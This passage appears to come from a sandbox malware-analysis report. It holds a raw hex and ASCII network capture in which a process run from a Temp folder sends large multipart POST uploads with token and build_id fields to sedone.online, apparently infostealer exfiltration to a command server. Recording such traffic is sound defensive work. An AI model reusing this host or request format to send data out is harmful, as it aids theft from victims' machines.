                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 47 56 4b 4e 47 56 33 37 59 35 38 51 39 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 47 56 4b 4e 47 56 33 37 59 35 38 51 39 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 47 56 4b 4e 47 56 33 37 59 35 38 51 39 52 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------AAA1NGVKNGV37Y58Q9RIContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------AAA1NGVKNGV37Y58Q9RIContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------AAA1NGVKNGV37Y58Q9RICont
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:25 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:26 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                30192.168.2.849830116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC329OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ECB16X479H47QQ1N7G4O
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 6990993
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 31 36 58 34 37 39 48 34 37 51 51 31 4e 37 47 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 31 36 58 34 37 39 48 34 37 51 51 31 4e 37 47 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 31 36 58 34 37 39 48 34 37 51 51 31 4e 37 47 34 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------ECB16X479H47QQ1N7G4OContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------ECB16X479H47QQ1N7G4OContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------ECB16X479H47QQ1N7G4OCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
